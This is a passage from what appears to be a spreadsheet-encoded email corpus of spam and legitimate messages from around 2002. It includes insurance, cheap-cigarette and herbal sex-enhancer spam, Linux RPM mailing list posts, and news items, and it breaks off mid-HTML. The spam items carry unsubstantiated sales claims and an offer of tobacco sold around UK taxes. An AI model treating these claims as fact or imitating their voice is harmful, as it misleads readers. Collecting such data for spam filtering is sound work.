 ? Nonsmoker=20
 ? $500,000 Face
 ? Type 1 Diabetic - Treated with Insulin Pump
 ? Diagnosed at age 23
 ? Hospitalized in '95, '96 and '98 with
   "Diabetic Complications"
 ? Issued Standard 	? Male age 51
 ? Nonsmoker=20
 ? $1,200,000 Face
 ? 6'0", 237lbs=20
 ? Takes Micronase and Glucophage
 ? Issued Super Standard =09
 Case 3:	 Case 4:	=20
 ? Female age 60
 ? Nonsmoker=20
 ? $2,000,000 Face
 ? 5'5", 165lbs=20
 ? Insulin Dependent=20
 ? Issued Super Standard 	? Male age 45
 ? Nonsmoker=20
 ? $875,000 Face
 ? 6'4", 275lbs
 ? Diabetes Controlled by Diet
 ? Issued Super Standard =09
 Click here to provide the details on your "tough case"
 &lt;http://nettrac.ipipeline.com/askdoctor/doctor.asp?gaid=3D0162&gt; 	=20
 Call the Doctor with your case details!
 We've cured 1,000s of agents' "tough cases!"
  800-624-4502 ext. 18=09
 =97 or =97
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
 Tennessee Brokerage Agency - www.TBA.com &lt;http://www.tba.com&gt; =20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.InsuranceIQ.com/optout
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_143B1F_01C25A7A.A80CB430
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;The TBA Doctor Walks the Walk on Diabetes&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#003333" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/images/tba/0729/20020729-101.gif" =
 alt=3D"The TBA Doctor Walks the Walk... On Diabetes!" width=3D"550" =
 height=3D"41"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/tba/0729/20020729-102.gif" =
 width=3D"278" height=3D"255"&gt;&lt;img =
 src=3D"http://iiq.us/images/tba/0729/20020729-103.gif" width=3D"272" =
 height=3D"255"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/tba/0729/20020729-104.gif" =
 width=3D"278" height=3D"190"&gt;&lt;img =
 src=3D"http://iiq.us/images/tba/0729/20020729-105.gif" width=3D"272" =
 height=3D"190"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;br&gt;=20
             &lt;table width=3D"100%" border=3D"1" cellpadding=3D"4" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr bgcolor=3D"#000066"&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" =
 size=3D"2"&gt;Case 1:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" =
 size=3D"2"&gt;Case 2:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor=3D"#FFFFCC"&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Male age =
 37&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$500,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;Type 1 Diabetic - Treated with Insulin =
 Pump&lt;br&gt;
                   &amp;#149;&amp;nbsp;Diagnosed at age 23&lt;br&gt;
                   &amp;#149;&amp;nbsp;Hospitalized in '95, '96 and '98 with&lt;br&gt;
                   &amp;nbsp;&amp;nbsp;&amp;quot;Diabetic Complications&amp;quot;&lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"50%" valign=3D"top"&gt;&lt;font =
 size=3D"2"&gt;&amp;#149;&amp;nbsp;Male age 51&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$1,200,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;6'0&amp;quot;, 237lbs &lt;br&gt;
                   &amp;#149;&amp;nbsp;Takes Micronase and Glucophage&lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued Super =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor=3D"#000066"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Case =
 3:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Case =
 4:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor=3D"#FFFFCC"&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Female =
 age 60&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$2,000,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;5'5&amp;quot;, 165lbs &lt;br&gt;
                   &amp;#149;&amp;nbsp;Insulin Dependent &lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued Super =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Male age =
 45&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$875,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;6'4&amp;quot;, 275lbs&lt;br&gt;
                   &amp;#149;&amp;nbsp;Diabetes Controlled by Diet&lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued Super =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;a =
 href=3D"http://nettrac.ipipeline.com/askdoctor/doctor.asp?gaid=3D0162"&gt;&lt;i=
 mg src=3D"http://iiq.us/images/tba/0729/20020729-2.gif" alt=3D"Click =
 here to provide the details on your &amp;quot;tough case&amp;quot;" =
 width=3D"484" height=3D"106" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;b&gt;&lt;font color=3D"#0000CC" size=3D"4"&gt;Call the Doctor with =
 your case details!&lt;br&gt;
             &lt;font color=3D"#FF0000"&gt;We've cured 1,000s of agents' =
 &amp;quot;tough cases!&amp;quot;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/tba/0729/20020729-3.gif" =
 alt=3D"800-624-4502 ext. 18" width=3D"540" height=3D"101"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"center"&gt;&lt;font size=3D"2"&gt;&amp;#8212; or =
 &amp;#8212;&lt;/font&gt;&lt;br&gt;
 						&lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
 							&lt;tr&gt;=20
 								&lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
 									&lt;td&gt;=20
 										&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Please fill =
 out the form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"impairedrisk@tba.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"TBA Diabetes Ad Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
 									&lt;/td&gt;
 								&lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					  &lt;br&gt;
             &lt;a href=3D"http://www.tba.com"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-3.gif" alt=3D"Tennessee =
 Brokerage Agency - www.TBA.com" width=3D"368" height=3D"106" =
 border=3D"0"&gt;&lt;/a&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt; &lt;p&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;=20
         We don't want anyone to receive our mailings who does not wish =
 to. This=20
         is professional communication sent to insurance professionals. =
 To be removed=20
         from this mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. =
 Instead,=20
         go here: &lt;a =
 href=3D"http://www.InsuranceIQ.com/optout"&gt;http://www.InsuranceIQ.com/opt=
 out&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_143B1F_01C25A7A.A80CB430--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: apt-get problem ?
</t>
  </si>
  <si>
    <t xml:space="preserve">When I try to use apt-get upgrade
 it wants to install libusb while I got it
 (same version)
 and all collapse because of this.
 Roi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 06:10:40PM +0100, Ronan Waide wrote:
 &gt; Sure, but soft links would do the same. To be honest, I'm trying to
 &gt; think of a useful use of hard links right now, and I'm a little
 &gt; stumped. There's gotta be some benefit that I'm missing that's
 &gt; immediately obvious to everyone.
 mh used them nicely.  mh stores one message per file.  the refile command
 allows you to move a message from one folder to another *or* link it to
 another folder.  it uses hard links to do this.  this would suck to if
 it used soft links - what if i later deleted the actual file?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</si>
  <si>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Microsoft Buys XDegrees - Secure Access Company
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ==
 http://siliconvalley.internet.com/news/article.php/10862_1460701
 Microsoft Tuesday said it has purchased a Mountain View, Calif.-based
 security company to better secure its core file services including its
 Windows platform and .NET initiative.
 The Redmond, Wash-based software giant has acquired the assets of XDegrees
 for an undisclosed amount of cash and is in the process of relocating the
 team of 12 or 14 engineers to the Microsoft campus.
 XDegrees' technology assigns URLs to Word files, video clips, and other
 digital documents for access across a peer-to-peer network
 XDegrees founder Michael Tanne was offered a job, but decided instead to
 play his hand in the Silicon Valley.
 ==========
 "XDegrees' technology assigns URLs to Word files, video clips, and other
 digital documents for access across a peer-to-peer network" - assigns URLs
 to Word files... and somebody /bought/ that?
 ===
 http://www.xdegrees.com/pr_2001-11-12_1.html
 "The XDegrees System allows users to easily and consistently locate, access
 and manage information by assigning each document a unique link. Providing
 end-to-end security, the XDegrees System unifies authentication of all
 users, provides file-level access control and encrypts all stored and
 transferred files. Seamless integration with existing applications such as
 email clients and Microsoft Office products allows companies to rapidly
 deploy the XDegrees System and users to get up-and-running quickly."
 Whoa... high tech...
 ===
 More bits here...
 http://www.openp2p.com/pub/a/p2p/2001/04/27/xdegrees.html
 "The essence of XDegrees consists of a naming system and a distributed
 database that allows peers to resolve resource names. XDegrees manages these
 services for customers on its own hosts, and sells its software to
 enterprises so they can define and run their own namespaces on in-house
 servers. You can search for a particular person (whatever device the person
 is currently using), for a particular device, for a file, or even for a web
 service. The software that resolves resource names is called XRNS (the
 eXtensible Resource Name System)."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Red Hat 8.0
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 Red Hat 8.0 is released tomorrow (monday).  I took some time out to make 
 RPMs of GStreamer for it.
 All of them (core, plugins and player) have been uploaded to the apt 
 repository in a new "redhat-80-i386" directory.
 The repository for dependencies is again called "deps", and the one for 
 the gstreamer rpms is "redhat", because this time around the base distro 
 contains all the necessary packages.
 A screenshot of Red Hat 8.0 running gst-player is up at
 http://thomas.apestaart.org/download/screenshots/redhat-80-gst-player.png
 Here are some known issues with the resulting rpms :
 a) gstreamer-nautilus isn't built, the package got renamed and I don't 
 have a -devel package for it yet
 b) the c++ plugins have problems which I haven't been able to resolve.
 Here are the errors:
 INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
 /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
 /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0: 
 undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE
 Plugin /usr/lib/gst/libgstwincodec.so failed to load
 DEBUG(15299: 0)gst_plugin_load_plugin:161: attempt to load plugin 
 "/usr/lib/gst/libgstmodplug.so"
 INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
 /usr/lib/gst/libgstmodplug.so failed to load: Error loading plugin 
 /usr/lib/gst/libgstmodplug.so, reason: /usr/lib/gst/libgstmodplug.so: 
 undefined symbol: __gxx_personality_v0
 I'm not sure how to fix this; running strings on the libs in /usr/lib 
 reveals that there are other libs that have these symbols, so there must 
 be something straightforward that should fix this.
 If anyone has a suggestion, please share ;)
 Thomas
 -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 Kiss me please kiss me
 Kiss me out of desire baby not consolation
 Oh you know it makes me so angry cause I know that in time
 I'll only make you cry
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Low Price Smokes
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam
 If you are fed up of being 'ripped off' by the British government every time you buy your tobacco, then you should visit our website, where you can now buy 4 cartons of cigarettes, or 40 pouches of rolling tobacco from as little as 170 Euros (approx 105 pounds), inclusive of delivery by registered air mail from our office in Spain.  
 Why pay more???
 Visit our website at
 http://www.cheapsmoking.com/?ID=2
 Best regards
 Sales Department
 Cheap Smoking
 Spain
 xay1992361y
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: erratum [Re: no matter ...] &amp; errors
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; I'm not sure what you mean by "let's you and him fight", but it is 
 &gt; important to remember that England was in control of Ireland
 &gt; for 300 years ...
 Exactly -- "let's you and him fight" is a
 way of dealing with troublesome populations
 by moving them next to one another, so they
 give each other, and not the Man, grief*.
 So by my understanding (and, you all will
 understand, with tongue firmly in cheek):
 Ireland:  Irish?  Uppity barbarians overly
    fond of "risings".  Scots?  More uppity
    barbarians overly fond of "risings".
    Why not plonk down a bunch of the latter
    next to the former and kill two birds
    with one stone?
 Israel:  Ex-ottomans?  Uppity barbarians
    (didn't they help kick out the Ottomans?)
    Zionists?  Uppity sorts who aren't happy
    with perfectly good land in Uganda.  Why
    not plonk down a bunch of the latter next
    to the former and kill two birds with one
    stone?
 but not:
 India: in which the muslims and hindus were
     originally intermixed to some degree,
     but Partioned due to their own conflict,
     not due to English resettlement policy.
 Canada: in which the french and english were
     already established, and it was just the
     balance of power on the continent that
     determined events in the colonies.  The
     Acadians got resettled, but they don't
     seem to have been that good for picking
     fights with their neighbors, so no one
     had them plonked down next door.
 -Dave
 * this works best with a populace who,
 given "one man, one vote", immediately
 deduce "one less man, one less vote" --
 eh, Magnan?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IMG: http://radio.weblogs.com/0001015/images/2002/09/25/uncSamMedium.gif
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:39:47AM
 Date: Wed, 25 Sep 2002 12:39:47 GMT
 [IMG: http://radio.weblogs.com/0001015/images/2002/09/25/uncSamMedium.gif (A 
 picture named uncSamMedium.gif)][1]Last year on this day[2]: "It's been 
 not-correct for most of my life for Americans to say we love our country. 
 That's a big bug. We're the world's greatest country and we know it. I love the 
 USA. It gave me life, an education, role models and a philosophy. And if you 
 think we're stupid or decadent, just try fucking with us."
 [1] http://www.scripting.com/images/2001/09/22/uncleSam.jpg
 [2] http://scriptingnews.userland.com/backissues/2001/09/25#bushAndTheDoves
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] White Horse vandalised
</t>
  </si>
  <si>
    <t xml:space="preserve">http://yorkshirepost.co.uk/ed/front/481722
 Pro-hunt activists target top sight
 ONE of Yorkshire's most famous sights yesterday became one of the first
 targets in bizarre attacks on White Horse landmarks linked to the hunting
 debate.
 Villagers near Thirsk could not believe their eyes when they woke yesterday
 to find the famous White Horse of Kilburn had acquired a rider during the
 night.
 In another incident, the Uffington white horse in Oxfordshire had a huntsman
 and three hounds added to the ancient figure, which is thought to represent
 a Celtic god or tribal symbol.
 Pro-hunt activists in the Real Countryside Alliance (RCA)  a radical
 alternative to the better-known Countryside Alliance  admitted
 responsibility last night for targeting the two images.
 The 314ft by 228ft landmark at Kilburn has been lovingly preserved since it
 was carved in the limestone by schoolmaster John Hodgson and his pupils in
 1857.
 But during Monday night someone nailed on a massive figure of a huntsman
 with a horn  which had been cut to scale out of a single piece of white
 carpet. It was removed yesterday by members of Kilburn White Horse
 Association, who found a Countryside Alliance badge attached to the carpet.
 John Roberts of the association said: "It has obviously been very well
 organised. It was a well crafted piece of kit: a figure of a huntsman with a
 horn cut out of carpets.
 "It was big and impressive and could be seen for miles about. They tied it
 to bushes at the top and nailed it down. It caused all the stone chippings
 to be pushed downwards, which will help turn the white horse grey. It will
 not get another refit for another year.
 "Whoever did it must have come with a vehicle  a tractor and trailer or a
 lorry  because the carpet must have come in one piece. It was extremely
 well planned and took several people an hour and a half to get it off."
 The sculpture needs constant work because, unlike chalk horses in the south
 of England, it is cut into limestone which is the wrong colour and needs
 whitening.
 Mr Roberts added: "The damage as such is not great but it adds to the
 deterioration, which means it will need more work next time.
 "We would have more sympathy if, having made the point, they would come to
 take it away again because it was a major job."
 Andy Wilson, chief executive of the North York Moors National Park, said:
 "It is a scheduled ancient monument and the local residents are very proud
 of it and go to enormous trouble to keep it white. There is also careful
 consideration of what shape it should be kept with the constant growth of
 vegetation so you can understand the alarm and regret at any changes. There
 has not been a cut in the turf  which would be much more of a problem. It
 would seem it was carefully plotted beforehand."
 An RCA spokesman said: "Some people in the country are getting very
 frustrated at the inaction. All we want is Ministers to take notice. Marches
 don't seem to be doing anything good."
 The Countryside Alliance said it did not have any part in the action.
 Spokesman Adrian Yelland said: "The Countryside Alliance only ever advocates
 campaigning that is lawful and dissociates itself from acts of vandalism and
 regrets any damage that may have been caused by this incident."
 The incident follows graffiti on road signs and motorway bridges in
 Yorkshire thought to be RCA work.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">On 05 September 2002, Tim Peters said:
 &gt; Greg Ward is
 &gt; currently capturing a stream coming into python.org, and I hope we can get a
 &gt; more modern, and cleaner, test set out of that.
 Not yet -- still working on the required config changes.  But I have a
 cunning plan...
 &gt; But if that stream contains
 &gt; any private email, it may not be ethically possible to make that available.
 It will!  Part of my cunning plan involves something like this:
   if folder == "accepted":             # ie. not suspected junk mail
       if (len(recipients) == 1 and
           recipients[0] in ("guido@python.org", "barry@python.org", ...)):
           folder = "personal"
 If you (and Guido, Barry, et. al.) prefer, I could change that last
 statement to "folder = None", so the mail won't be saved at all.  I
 *might* also add a "and sender doesn't look like -bounce-*, -request,
 -admin, ..." clause to that if statement.
 &gt; Can you think of anyplace to get a large, shareable ham sample apart from a
 &gt; public mailing list?  Everyone's eager to share their spam, but spam is so
 &gt; much alike in so many ways that's the easy half of the data collection
 &gt; problem.
 I believe the SpamAssassin maintainers have a scheme whereby the corpus
 of non-spam is distributed, ie. several people have bodies of non-spam
 that they use for collectively evolving the SA score set.  If that
 sounds vague, it matches my level of understanding.
         Greg
 -- 
 Greg Ward &lt;gward@python.net&gt;                         http://www.gerg.ca/
 Reality is for people who can't handle science fiction.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Animated existentialism
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528777
 Date: Not supplied
 Modern Living is a series of about 100 tiny Flash animations that use 
 recursions, gloomy music and simple interactivity to make inarticulate yet 
 compelling existentialist morality plays. This stuff is like Philip K Dick 
 rendered as a series of five-second interactive animations. I've just killed an 
 entire hour on this thing, and now I want to go watch a Pinter play. Link[1] 
 Discuss[2] (_Thanks, Rich[3]!_)
 [1] http://www.hoogerbrugge.com/ml.html
 [2] http://www.quicktopic.com/boing/H/RCCGA7ixhETnc
 [3] http://www.imparte.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: MEN &amp; WOMEN, MAKE BETTER WHOOPEE!            23967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</si>
  <si>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&lt;title&gt;Vigoral Ad&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"460" height=3D"393" cellpadding=3D"0" cells=
 pacing=3D"0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"460" height=3D"387" align=3D"left"&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"98%" height=3D"79" bgcolor=3D"#FFFF99"&gt;
     &lt;tr&gt;
       &lt;th width=3D"71%" height=3D"73" align=3D"center"&gt;&lt;font size=3D"3" co=
 lor=3D"#FF0000"&gt;&lt;b&gt;Vigoral Herbal Sex Enhancers&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;b&gt;&lt;font fac=
 e=3D"Times New Roman" color=3D"#FF0000" size=3D"3"&gt;Direct from
         the lab to you!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" =
 color=3D"#0066FF"&gt;We
         are Now Offering 3 Unique Products to help increase your moments w=
 ith
         that special someone @ &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2" col=
 or=3D"#FF0000"&gt;Only
         $24.99 each!!!&lt;/font&gt;&lt;/b&gt;&lt;/th&gt;
       &lt;th width=3D"29%" height=3D"73" align=3D"center"&gt;&lt;a href=3D"http://w=
 ww.medievalmedia.com/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025=
 /freeshipping1.gif" width=3D"160" height=3D"80"&gt;&lt;/a&gt;&lt;/th&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"59%" height=3D"351"&gt;
     &lt;tr&gt;
       &lt;td width=3D"88%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.polwas.com/0025/SUPER.jpg" width=3D"138" height=3D=
 "72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"80%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.polwas.com/0025/SUPERb.jpg" width=3D"139" height=
 =3D"72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"88" align=3D"center" bordercolor=3D"#FF=
 FF99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" borde=
 rcolordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img bord=
 er=3D"0" src=3D"http://www.polwas.com/0025/SUPERv.jpg" width=3D"163" heigh=
 t=3D"72"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/supervigoral.jpg"=
  width=3D"91" height=3D"158"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" co=
 lor=3D"#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/vigorgel.jpg" wid=
 th=3D"90" height=3D"160"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=3D=
 "#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
